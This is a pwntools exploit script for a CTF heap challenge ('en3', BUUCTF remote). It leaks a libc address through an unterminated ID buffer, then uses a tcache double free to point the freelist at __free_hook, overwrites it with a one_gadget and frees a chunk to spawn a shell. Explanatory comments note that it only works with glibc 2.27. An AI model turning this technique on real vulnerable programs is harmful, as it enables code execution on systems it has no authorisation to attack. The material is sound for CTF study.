漏洞点:
可泄露libc
double_free可修改fd指针,到hook,写入one_gadget即可getshell
from pwn import *
from LibcSearcher import *
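# Paths to the challenge binary and the libc build it was run against.
local_file = './en3'
local_libc = './libc-2.27.so'
# remote_libc = './libc-2.23.so'
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
e = ELF(local_file)
context.arch = e.arch

# 0 = run the binary locally, anything else = talk to the remote instance.
# Both branches load the same libc ELF; only the tube differs.
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn', 29171)
    libc = ELF(local_libc)

# Short aliases over the pwntools tube API; the helpers below are written
# against these names, so they stay module-level.
se = lambda data: r.send(data)
sa = lambda delim, data: r.sendafter(delim, data)
sl = lambda data: r.sendline(data)
# The original aliased r.slafter, which is not a tube method; sendlineafter is
# the call that matches the "sla" (send-line-after) naming and the sibling
# sa/sea aliases.
sla = lambda delim, data: r.sendlineafter(delim, data)
sea = lambda delim, data: r.sendafter(delim, data)
rc = lambda numb=4096: r.recv(numb)
rl = lambda: r.recvline()
ru = lambda delims: r.recvuntil(delims)
# Unpack a leaked little-endian word: read up to `data`, keep the trailing
# 4 (resp. 6) bytes and zero-pad to a full 32- (resp. 64-) bit value.
uu32 = lambda data: u32(ru(data)[-4:].ljust(4, b'\0'))
uu64 = lambda data: u64(ru(data)[-6:].ljust(8, b'\0'))
info_addr = lambda tag, addr: r.info(tag + ': {:#x}'.format(addr))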
def dbg():
    """Attach gdb to the live tube, then block until the operator continues."""
    tube = r
    gdb.attach(tube)
    pause()
def add(size, buf):
    """Drive menu option 1: answer the size prompt, then the content prompt.

    Args:
        size: value sent when the program asks for the story size.
        buf: payload sent when the program asks for the story text.
    """
    r.recvuntil("Input your choice:")
    r.sendline("1")
    r.recvuntil("Please input the size of story: \n")
    r.sendline(str(size))
    r.recvuntil("please inpute the story: \n")
    r.sendline(buf)
def free(idx):
    """Drive menu option 4: release the entry stored at index `idx`.

    Args:
        idx: index sent when the program asks which entry to free.
    """
    r.recvuntil("Input your choice:")
    r.sendline("4")
    r.recvuntil("Please input the index:\n")
    r.sendline(str(idx))
# --- Stage 1: leak a libc pointer through the name/ID prompts -------------
ru(b"What's your name?")
sl(b'aaaa')
ru(b'Please input your ID.')
# Exactly 8 bytes with no newline; presumably fills the ID buffer without a
# terminator so the program's echo runs on into adjacent memory — confirm
# against the binary.
se(b'a'*8)
# Skip the echoed ID, then read up to the first 0x7f byte: on x86-64 Linux a
# user-space libc pointer's most significant byte is 0x7f, so the 6 bytes
# before it are the leaked address.
ru(b'a'*8)
addr = uu64(b'\x7f')
# The leaked pointer sits 231 bytes past setbuffer in this libc build
# (looks like a return address inside setbuffer — verify in a debugger);
# subtracting the symbol offset gives the load base.
base = addr - 231 - libc.sym['setbuffer']
success("base:"+hex(base))
# NOTE(review): `sys` shadows the sys module re-exported by `from pwn import *`;
# it is assigned here but only written into a chunk below, never called.
sys = base + libc.sym['system']
# Hard-coded one-gadget offset for the libc-2.27 build shipped with this
# challenge; it does not transfer to any other build.
one_gadget = base + 0x4f322
malloc_hook = base + libc.sym['__malloc_hook']   # resolved but unused below
free_hook = base + libc.sym['__free_hook']

# --- Stage 2: corrupt the freelist via the double free ---------------------
add(0x80,'/bin/sh\x00')
# Index 0 is freed twice: the program evidently does not clear its pointer
# after free (the vulnerability named in the header). glibc >= 2.29 detects
# this pattern in tcache (the `key` field) and aborts; this target runs 2.27.
free(0)
free(0)
# Per the header note, the next same-size allocation hands back the
# doubly-freed chunk and this write lands in its forward pointer, so the
# freelist now points at __free_hook.
add(0x80,p64(free_hook))
# Second allocation returns the same chunk again; the system address written
# here is not what the hook ends up pointing to.
add(0x80,p64(sys))
# Third allocation is the __free_hook slot itself; it is overwritten with the
# one-gadget address. __free_hook no longer exists in glibc >= 2.34, so this
# sink is specific to older builds.
add(0x80,p64(one_gadget))
# Freeing index 0 goes through the overwritten hook.
free(0)
r.interactive()